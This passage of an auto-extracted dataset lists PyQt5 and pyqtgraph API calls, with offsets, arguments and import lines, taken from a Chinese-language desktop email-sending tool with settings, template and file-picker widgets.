QTableWidgetItem, QHeaderView\n'), ((1298, 1315), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""寄送"""'], {}), "('寄送')\n", (1309, 1315), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1472, 1512), 'pyqtgraph.setConfigOption', 'setConfigOption', (['"""background"""', '"""#19232D"""'], {}), "('background', '#19232D')\n", (1487, 1512), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((1521, 1555), 'pyqtgraph.setConfigOption', 'setConfigOption', (['"""foreground"""', '"""d"""'], {}), "('foreground', 'd')\n", (1536, 1555), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((1564, 1596), 'pyqtgraph.setConfigOptions', 'setConfigOptions', ([], {'antialias': '(True)'}), '(antialias=True)\n', (1580, 1596), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((2553, 2562), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2560, 2562), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2613, 2626), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (2624, 2626), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2754, 2763), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2761, 2763), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2847, 2860), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (2858, 2860), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2961, 2970), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2968, 2970), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3056, 3069), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (3067, 3069), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3432, 3451), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""發送信件"""'], {}), "('發送信件')\n", (3443, 3451), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3542, 3561), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""系統設定"""'], {}), "('系統設定')\n", (3553, 3561), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3649, 3669), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""資料庫設定"""'], {}), "('資料庫設定')\n", (3660, 3669), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3761, 3780), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""修改樣板"""'], {}), "('修改樣板')\n", (3772, 3780), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3878, 3901), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""\x08觸發明細"""'], {}), "('\\x08觸發明細')\n", (3889, 3901), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3993, 4014), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""下載觸發明細"""'], {}), "('下載觸發明細')\n", (4004, 4014), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4106, 4123), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""退出"""'], {}), "('退出')\n", (4117, 4123), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4674, 4685), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (4683, 4685), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4841, 4855), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ([], {}), '()\n', (4853, 4855), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5013, 5035), 'pyqtgraph.GraphicsLayoutWidget', 'GraphicsLayoutWidget', ([], {}), '()\n', (5033, 5035), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((5158, 5169), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5167, 5169), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5201, 5212), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5210, 5212), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5243, 5260), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5254, 5260), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5384, 5395), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5393, 5395), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5430, 5441), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5439, 5441), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5478, 5495), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5489, 5495), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5625, 5636), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5634, 5636), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5667, 5684), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5678, 5684), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5984, 5999), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""使用"""'], {}), "('使用')\n", (5993, 5999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6034, 6051), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""執行"""'], {}), "('執行')\n", (6045, 6051), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6166, 6177), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6175, 6177), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6206, 6217), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6215, 6217), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6246, 6257), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6255, 6257), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6290, 6301), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6299, 6301), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6329, 6344), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""使用"""'], {}), "('使用')\n", (6338, 6344), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6373, 6384), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6382, 6384), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6414, 6431), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (6425, 6431), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6544, 6561), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""測試"""'], {}), "('測試')\n", (6555, 6561), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6670, 6681), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6679, 6681), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6708, 6719), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6717, 6719), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6746, 6757), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6755, 6757), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6788, 6799), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6797, 6799), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6830, 6841), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6839, 6841), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6870, 6881), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6879, 6881), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6969, 6986), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (6980, 6986), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7124, 7135), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7133, 7135), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7171, 7182), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7180, 7182), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7212, 7226), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""是"""'], {}), "('是')\n", (7221, 7226), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7256, 7267), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7265, 7267), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7298, 7315), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (7309, 7315), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7436, 7447), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7445, 7447), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7473, 7485), 'PyQt5.QtWidgets.QTabWidget', 'QTabWidget', ([], {}), '()\n', (7483, 7485), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7618, 7627), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (7625, 7627), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7654, 7663), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (7661, 7663), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7793, 7806), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (7804, 7806), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7836, 7849), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (7847, 7849), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8065, 8076), 'PyQt5.QtWidgets.QTextEdit', 'QTextEdit', ([], {}), '()\n', (8074, 8076), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8104, 8120), 'PyQt5.QtWebEngineWidgets.QWebEngineView', 'QWebEngineView', ([], {}), '()\n', (8118, 8120), False, 'from PyQt5.QtWebEngineWidgets import QWebEngineView\n'), ((8275, 8292), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""清除"""'], {}), "('清除')\n", (8286, 8292), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8390, 8407), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""讀取"""'], {}), "('讀取')\n", (8401, 8407), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8503, 8520), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (8514, 8520), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8629, 8643), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ([], {}), '()\n', (8641, 8643), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8732, 8743), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (8741, 8743), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8772, 8783), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (8781, 8783), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8868, 8885), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""執行"""'], {}), "('執行')\n", (8879, 8885), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15450, 15518), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Eml Files (*.eml)"""'], {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')\n", (15477, 15518), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15605, 15676), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Excel Files (*.xlsx)"""'], {}), "(self, '選取檔案', './', 'Excel Files (*.xlsx)')\n", (15632, 15676), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15762, 15838), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Word Files (*.doc *.docx)"""'], {}), "(self, '選取檔案', './', 'Word Files (*.doc *.docx)')\n", (15789, 15838), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15925, 16011), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Annex Files (*.jpg *.png *.zip)"""'], {}), "(self, '選取檔案', './',\n 'Annex Files (*.jpg *.png *.zip)')\n", (15952, 16011), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18931, 18999), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Eml Files (*.eml)"""'], {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')\n", (18958, 18999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19081, 19102), 'mylibrary.genmail.get_msg', 'gm.get_msg', (['file_name'], {}), '(file_name)\n', (19091, 19102), True, 'import mylibrary.genmail as gm\n'), ((22664, 22687), 'PyQt5.QtWidgets.QApplication.instance', 'QApplication.instance', ([], {}), '()\n', (22685, 22687), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1069, 1103), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\n', (1101, 1103), False, 'import qdarkstyle, sys\n'), ((1141, 1154), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""收件人"""'], {}), "('收件人')\n", (1147, 1154), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2107, 2141), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\n', (2139, 2141), False, 'import qdarkstyle, sys\n'), ((5815, 5842), 'PyQt5.QtCore.QDateTime.currentDateTime', 'QDateTime.currentDateTime', ([], {}), '()\n', (5840, 5842), False, 'from PyQt5.QtCore import Qt, QDateTime\n'), ((11920, 11933), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (11926, 11933), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, 